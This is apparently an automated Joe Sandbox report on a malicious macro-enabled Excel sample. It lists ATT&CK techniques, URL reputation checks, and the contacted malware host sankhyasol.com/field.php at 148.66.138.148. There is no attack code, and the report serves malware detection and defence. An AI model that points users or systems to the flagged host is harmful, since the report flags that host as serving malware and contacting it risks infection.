Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
sankhyasol.com2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
http://sankhyasol.com/field.php100%Avira URL Cloudmalware
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sankhyasol.com
148.66.138.148
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://sankhyasol.com/field.phptrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
    high
    https://login.microsoftonline.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
      high
      https://shell.suite.office.com:14430C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
          high
          https://autodiscover-s.outlook.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
              high
              https://cdn.entity.0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                    high
                    https://powerlift.acompli.net0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v10C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                      high
                      https://cortana.ai0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                high
                                https://api.aadrm.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                      high
                                      https://cr.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                            high
                                            https://graph.ppe.windows.net0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                            high
                                                            https://graph.windows.net0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                high
                                                                                                https://api.office.net0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v20C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize0C794E1D-4401-4880-A309-2B416FE04208.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  148.66.138.148
                                                                                                                                                  sankhyasol.comSingapore
                                                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                  Analysis ID:382679
                                                                                                                                                  Start date:06.04.2021
                                                                                                                                                  Start time:13:55:08
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 4s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Documents_1605962083_895739149.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal64.expl.evad.winXLSM@1/15@1/1
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 168.61.161.212, 204.79.197.200, 13.107.21.200, 13.88.21.125, 92.122.145.220, 52.109.76.68, 52.109.88.39, 52.109.12.21, 40.88.32.150, 52.109.12.24, 184.30.20.56, 20.82.209.183, 93.184.221.240, 20.50.102.62, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 20.82.210.154
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  148.66.138.148Documents_1605962083_895739149.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
